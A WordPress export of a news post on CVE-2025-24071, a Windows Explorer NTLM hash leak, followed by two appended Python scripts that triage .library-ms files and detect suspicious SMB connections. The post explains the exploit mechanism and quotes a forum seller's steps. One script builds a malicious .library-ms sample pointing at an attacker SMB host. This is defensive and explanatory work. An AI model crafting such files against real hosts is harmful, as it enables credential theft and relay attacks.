{"id":2699,"date":"2025-03-19T10:03:37","date_gmt":"2025-03-19T10:03:37","guid":{"rendered":"https:\/\/serisec.com\/index.php\/2025\/03\/19\/microsoft-windows-file-explorer-vulnerability-let-attackers-perform-network-spoofing-poc-released\/"},"modified":"2025-03-19T10:03:37","modified_gmt":"2025-03-19T10:03:37","slug":"microsoft-windows-file-explorer-vulnerability-let-attackers-perform-network-spoofing-poc-released","status":"publish","type":"post","link":"https:\/\/serisec.com\/index.php\/2025\/03\/19\/microsoft-windows-file-explorer-vulnerability-let-attackers-perform-network-spoofing-poc-released\/","title":{"rendered":"Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing \u2013 PoC Released"},"content":{"rendered":"<div>\n<p>A high-severity vulnerability in <a href=\"https:\/\/cybersecuritynews.com\/windows-file-explorer-vulnerability-exploited\/\" target=\"_blank\" rel=\"noreferrer noopener\">Windows File Explorer<\/a>, identified as CVE-2025-24071, enables attackers to capture a victim\u2019s NTLMv2 authentication response (a Net-NTLMv2 hash) with no user interaction beyond extracting a compressed archive.<\/p>\n<p>Security researchers have released a proof-of-concept exploit demonstrating the flaw, which Microsoft patched in its March 2025 updates.<\/p>\n<h2 class=\"wp-block-heading\"><strong>Microsoft Windows File Explorer Vulnerability<\/strong><\/h2>\n<p>The vulnerability, dubbed \u201cNTLM Hash Leak via RAR\/ZIP Extraction,\u201d exploits Windows Explorer\u2019s automatic file processing.<\/p>\n<p>When a specially crafted .library-ms file containing a malicious SMB path is extracted from a compressed archive, Windows Explorer automatically parses its contents to generate previews and index metadata.<\/p>\n<p>This 
automatic processing occurs even if the user never explicitly opens the extracted file.<\/p>\n<p>The .library-ms file format, which is XML-based and trusted by Windows Explorer to define library locations, includes a &lt;simpleLocation&gt; element that points to an attacker-controlled SMB server, according to the security researcher known as <a href=\"https:\/\/cti.monster\/blog\/2025\/03\/18\/CVE-2025-24071.html\" target=\"_blank\" rel=\"noreferrer noopener nofollow\">0x6rss<\/a>.<\/p>\n<figure class=\"wp-block-video\"><video controls src=\"https:\/\/cti.monster\/assets\/video\/procmon.mp4\"><\/video><\/figure>\n<p>Upon extraction, Windows Explorer automatically attempts to resolve the embedded SMB path (e.g., \\\\192.168.1.116\\shared) to gather <a href=\"https:\/\/cybersecuritynews.com\/hackers-hide-web-skimmer-stealer-within-exif-metadata\/\" target=\"_blank\" rel=\"noreferrer noopener\">metadata<\/a>.<\/p>\n<p>This triggers an NTLM authentication handshake from the victim\u2019s system to the attacker\u2019s server, leaking the victim\u2019s NTLMv2 challenge-response (Net-NTLMv2 hash) without any user interaction. That response cannot be replayed directly as a password hash, but it can be relayed to other services that do not enforce signing, or cracked offline to recover the plaintext password.<\/p>\n<p>Using process monitoring tools, researchers observed that immediately after extraction, both Explorer.exe and SearchProtocolHost.exe (part of the Windows indexing service) automatically perform several operations on the .library-ms file:<\/p>\n<ul class=\"wp-block-list\">\n<li>\n<strong>CreateFile:<\/strong> Opening the file automatically<\/li>\n<li>\n<strong>ReadFile:<\/strong> Reading the file contents<\/li>\n<li>\n<strong>QueryBasicInformationFile:<\/strong> Extracting metadata<\/li>\n<li>\n<strong>CloseFile:<\/strong> Closing the file after processing<\/li>\n<\/ul>\n<p>Wireshark captures confirm that these actions immediately trigger SMB communication attempts, including an NTLM authentication handshake.<\/p>\n<figure class=\"wp-block-table is-style-stripes\">\n<table class=\"has-fixed-layout\">\n<tbody>\n<tr>\n<td><strong>Risk 
Factors<\/strong><\/td>\n<td><strong>Details<\/strong><\/td>\n<\/tr>\n<tr>\n<td>Affected Products<\/td>\n<td>Microsoft Windows (specifically Windows File Explorer)<\/td>\n<\/tr>\n<tr>\n<td>Impact<\/td>\n<td>Leaks the victim\u2019s Net-NTLMv2 response<br \/>Enables NTLM relay attacks against services that do not enforce signing<br \/>Allows offline cracking of the response to recover the password<br \/>Classified by Microsoft as a spoofing vulnerability<\/td>\n<\/tr>\n<tr>\n<td>Exploit Prerequisites<\/td>\n<td>User must extract an archive containing a specially crafted .library-ms file<br \/>Attacker must run an SMB server that the victim can reach over TCP 445 to receive the authentication request<\/td>\n<\/tr>\n<tr>\n<td>CVSS 3.1 Score<\/td>\n<td>7.5 (High; Microsoft severity rating: Important)<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<\/figure>\n<h2 class=\"wp-block-heading\"><strong>PoC Exploitation<\/strong><\/h2>\n<p>The vulnerability exposes sensitive information to an unauthorized actor, enabling network spoofing attacks.<\/p>\n<p>A security researcher with the handle 0x6rss published a proof-of-concept exploit on <a href=\"https:\/\/cybersecuritynews.com\/ai-assisted-fake-github-repositories-steal-sensitive-data\/\" target=\"_blank\" rel=\"noreferrer noopener\">GitHub<\/a> on March 16, 2025. The PoC includes a Python script that generates the malicious .library-ms file and is run with a single command: <code>python poc.py<\/code><\/p>\n<p>Evidence suggests this vulnerability may have been sold and exploited in the wild before its public disclosure.<\/p>\n<p>A threat actor known as \u201cKrypt0n,\u201d reportedly the developer of malware called \u201cEncryptHub Stealer,\u201d allegedly offered the exploit for sale on underground forums.<\/p>\n<figure class=\"wp-block-image\"><img decoding=\"async\" src=\"https:\/\/lh7-rt.googleusercontent.com\/docsz\/AD_4nXdH8Atl2dEqQNk4YkILA4NwKRlpNnzAYPMxTder9cTYghYiCHB-0RFLgpTt_xtalHUf7sw2looAnGAS2BCVfJKVNDaw6LqO9DwZKDofI9B32f3JN3Dd0pRBcbPC3agnfTY4JhOs?key=ZjJC4nOkzCbIeZxTjcKE4MAJ\" alt=\"\"><figcaption class=\"wp-element-caption\">Threat Actor\u2019s post<\/figcaption><\/figure>\n<p>According to translated 
forum posts, the attacker explained: \u201cThe server where the hashes are sent is created locally, for example, on a VPS.<\/p>\n<p>Then, using an exploit, you generate a config with your IP, share, etc. [\u2026] If the user simply opens Explorer or accesses the shared folder, an automatic redirect occurs, and the user\u2019s hash is sent to your server.\u201d<\/p>\n<h2 class=\"wp-block-heading\"><strong>Mitigation<\/strong><\/h2>\n<p>Microsoft addressed this vulnerability in its March 2025 Patch Tuesday updates, released on March 11.<\/p>\n<p>All Windows users are strongly advised to apply these security updates immediately. This vulnerability adds to a growing list of NTLM-related flaws in Microsoft products, with researchers previously identifying similar credential-leaking issues in Microsoft Access, Publisher, and other applications.<\/p>\n<p>Security experts recommend keeping all Microsoft products updated and implementing additional protections against NTLM relay attacks, such as enforcing SMB signing, blocking outbound SMB (TCP 445) from clients to the internet at the network perimeter, restricting outgoing NTLM traffic to remote servers through the \u201cNetwork security: Restrict NTLM\u201d group policies, and disabling NTLM where possible.<\/p>\n<p>The post <a href=\"https:\/\/cybersecuritynews.com\/microsoft-windows-file-explorer-vulnerability-let-attackers\/\">Microsoft Windows File Explorer Vulnerability Let Attackers Perform Network Spoofing \u2013 PoC Released<\/a> appeared first on <a href=\"https:\/\/cybersecuritynews.com\/\">Cyber Security News<\/a>.<\/p>\n<\/div>\n<p>
Guru Baran<br \/>\n<a href=\"https:\/\/cybersecuritynews.com\/microsoft-windows-file-explorer-vulnerability-let-attackers\/\">Go to cyber-security-news<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p>A high-severity vulnerability in Windows File Explorer, identified as CVE-2025-24071, enables attackers to capture a victim\u2019s NTLMv2 authentication response (a Net-NTLMv2 hash) with no user interaction beyond extracting a compressed archive. Security researchers have released a proof-of-concept exploit demonstrating the flaw, which Microsoft patched in [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[129,63,158,131,395],"tags":[130],"class_list":["post-2699","post","type-post","status-publish","format-standard","hentry","category-cyber-security","category-cyber-security-news","category-microsoft","category-vulnerability","category-windows","tag-cyber-security-news"],"_links":{"self":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2699"}],"collection":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/comments?post=2699"}],"version-history":[{"count":0,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/posts\/2699\/revisions"}],"wp:attachment":[{"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/media?parent=2699"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/w
p-json\/wp\/v2\/categories?post=2699"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/serisec.com\/index.php\/wp-json\/wp\/v2\/tags?post=2699"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}
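The article above explains that Explorer reads the `<simpleLocation>` of an extracted .library-ms file and authenticates to whatever SMB host it names. The following is an added example, not code from the article or from the 0x6rss PoC: a Python triage script that parses .library-ms files and flags any library location that would make Explorer authenticate to an SMB host outside an allowlist. It assumes the documented Windows Library XML layout (a `libraryDescription` root in the `http://schemas.microsoft.com/windows/2009/library` namespace with a `<url>` child under each `<simpleLocation>`), and it generalises past the article's single UNC case by also treating `file://` and `smb://` locations as remote. The allowlist hosts (`fileserver01.corp.example`, `10.20.30.40`) and the three sample files are constructed; the `192.168.1.116` host is borrowed from the article's example.

```python
"""Triage .library-ms files for remote (UNC) library locations.

Added example, not code from the article or from the 0x6rss PoC. It
assumes the documented Windows Library XML layout: a <libraryDescription>
root in the http://schemas.microsoft.com/windows/2009/library namespace
whose <simpleLocation><url> entries name each library location. The
trusted-server allowlist and the three sample files are constructed.
"""
import re
import xml.etree.ElementTree as ET  # use defusedxml for hostile input in production
from dataclasses import dataclass
from typing import List, Optional
from urllib.parse import urlparse

LIB_NS = "http://schemas.microsoft.com/windows/2009/library"
# Hypothetical allowlist of file servers clients are expected to reach over SMB.
TRUSTED_HOSTS = {"fileserver01.corp.example", "10.20.30.40"}

# UNC path \\host\share[\...]; the article's example is \\192.168.1.116\shared
UNC_RE = re.compile(r"^\\\\([^\\/?*]+)[\\/]([^\\/]+)")


@dataclass
class Finding:
    location: str
    host: Optional[str]
    verdict: str  # "local", "trusted" or "suspicious"


def remote_host(location: str) -> Optional[str]:
    """Return the host Explorer would authenticate to, or None for local paths."""
    m = UNC_RE.match(location)
    if m:
        return m.group(1).lower()
    parsed = urlparse(location)
    if parsed.scheme in ("file", "smb") and parsed.netloc:  # file://host/share
        return parsed.netloc.lower()
    return None  # knownfolder:{GUID}, C:\..., shell: URIs and similar


def classify(location: str, trusted=TRUSTED_HOSTS) -> Finding:
    host = remote_host(location)
    if host is None:
        return Finding(location, None, "local")
    return Finding(location, host, "trusted" if host in trusted else "suspicious")


def library_locations(xml_bytes: bytes) -> List[str]:
    """Collect every <simpleLocation>/<url> text, namespaced or not."""
    root = ET.fromstring(xml_bytes)
    urls = root.findall(f".//{{{LIB_NS}}}simpleLocation/{{{LIB_NS}}}url")
    urls += root.findall(".//simpleLocation/url")
    return [(u.text or "").strip() for u in urls]


def triage(xml_bytes: bytes) -> List[Finding]:
    return [classify(loc) for loc in library_locations(xml_bytes)]


def is_suspicious(xml_bytes: bytes) -> bool:
    """True if any library location would make Explorer talk to an unknown SMB host."""
    return any(f.verdict == "suspicious" for f in triage(xml_bytes))


def make_library(url: str) -> bytes:
    """Constructed sample in the Windows Library layout (not a real file)."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="{LIB_NS}">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>{url}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
""".encode()


BENIGN = make_library("knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}")
TRUSTED = make_library(r"\\fileserver01.corp.example\public")
MALICIOUS = make_library(r"\\192.168.1.116\shared")  # host from the article

if __name__ == "__main__":
    for name, blob in (("benign", BENIGN), ("trusted", TRUSTED), ("malicious", MALICIOUS)):
        for f in triage(blob):
            print(f"{name:9s} {f.verdict:10s} host={f.host} location={f.location}")
```

Run it as a script to see the three verdicts, or call `is_suspicious()` on the bytes of each .library-ms found while scanning an archive at a mail gateway or file share. The verdict is based only on where the location points, which is the property Explorer acts on before the user opens anything; a `knownfolder:` GUID or a local drive path never triggers network authentication, so those are classified as local rather than ignored.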
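The article reports that Explorer.exe and SearchProtocolHost.exe themselves open the SMB connection that leaks the NTLMv2 response. The following is an added example, not from the article: detection logic over constructed network-connection records shaped like a Sysmon Event ID 3 (`Image`, `DestinationIp`, `DestinationPort`) flattened to key=value text. It flags SMB (445/139) connections from the shell or indexer to internal hosts outside a file-server allowlist, and any SMB connection leaving the organisation's internal ranges regardless of process. The internal ranges, the known file server `10.20.30.40`, the watched process names and the severity labels are hypothetical policy for the demo; the `192.168.1.116` destination is the article's example host.

```python
"""Flag SMB connections from the Windows shell/indexer to unexpected hosts,
the network signal the article reports for CVE-2025-24071.

Added example, not from the article. The records are constructed to mirror
the fields of a Sysmon Event ID 3 (network connection) event flattened to
key=value text; the internal address ranges, known-file-server list,
watched process names and severities are hypothetical policy for the demo.
"""
import ipaddress
import re
from typing import Dict, List, Optional, Tuple

SMB_PORTS = {445, 139}
# Processes that parse files on the user's behalf and should not reach SMB
# servers nobody asked for (the article shows both initiating the leak).
WATCHED_IMAGES = {"explorer.exe", "searchprotocolhost.exe"}
INTERNAL_NETS = [ipaddress.ip_network(n) for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
KNOWN_FILE_SERVERS = {ipaddress.ip_address("10.20.30.40")}  # hypothetical allowlist

KV_RE = re.compile(r'(\w+)=(?:"([^"]*)"|(\S+))')


def parse_event(line: str) -> Dict[str, str]:
    """Parse key=value and key="quoted value" tokens into a dict."""
    return {k: q or u for k, q, u in KV_RE.findall(line)}


def image_name(path: str) -> str:
    """Basename of a Windows image path, lower-cased for comparison."""
    return path.rsplit("\\", 1)[-1].lower()


def severity(ev: Dict[str, str]) -> Optional[str]:
    """Return "high", "medium" or None for one network-connection event."""
    if int(ev.get("DestinationPort", "0")) not in SMB_PORTS:
        return None
    dst = ipaddress.ip_address(ev["DestinationIp"])
    if dst in KNOWN_FILE_SERVERS:
        return None
    if not any(dst in net for net in INTERNAL_NETS):
        return "high"    # SMB leaving the organisation: the NTLM response goes to a stranger
    if image_name(ev.get("Image", "")) in WATCHED_IMAGES:
        return "medium"  # shell/indexer authenticating to an unlisted internal host
    return None


def detect(lines: List[str]) -> List[Tuple[str, str, str]]:
    """Return (severity, image basename, destination ip) for each alerting record."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        sev = severity(ev)
        if sev:
            alerts.append((sev, image_name(ev["Image"]), ev["DestinationIp"]))
    return alerts


SAMPLE_EVENTS = [  # constructed records, not real telemetry
    r'EventId=3 Image="C:\Windows\explorer.exe" DestinationIp=192.168.1.116 DestinationPort=445',
    r'EventId=3 Image="C:\Windows\System32\SearchProtocolHost.exe" DestinationIp=192.168.1.116 DestinationPort=445',
    r'EventId=3 Image="C:\Windows\explorer.exe" DestinationIp=10.20.30.40 DestinationPort=445',
    r'EventId=3 Image="C:\Program Files\Backup\agent.exe" DestinationIp=203.0.113.7 DestinationPort=445',
    r'EventId=3 Image="C:\Windows\explorer.exe" DestinationIp=198.51.100.9 DestinationPort=443',
]

if __name__ == "__main__":
    for sev, image, dst in detect(SAMPLE_EVENTS):
        print(f"[{sev.upper():6s}] {image} -> {dst}")
```

The two-tier rule matters for this bug: the article's PoC host is an RFC 1918 address, so a rule that only watches for SMB to the internet would miss it, while the forum seller's VPS scenario is caught by the "high" tier even when the initiating process is not Explorer. Tune the allowlist to the file servers clients legitimately use, otherwise the "medium" tier is noisy in environments with many ad hoc shares.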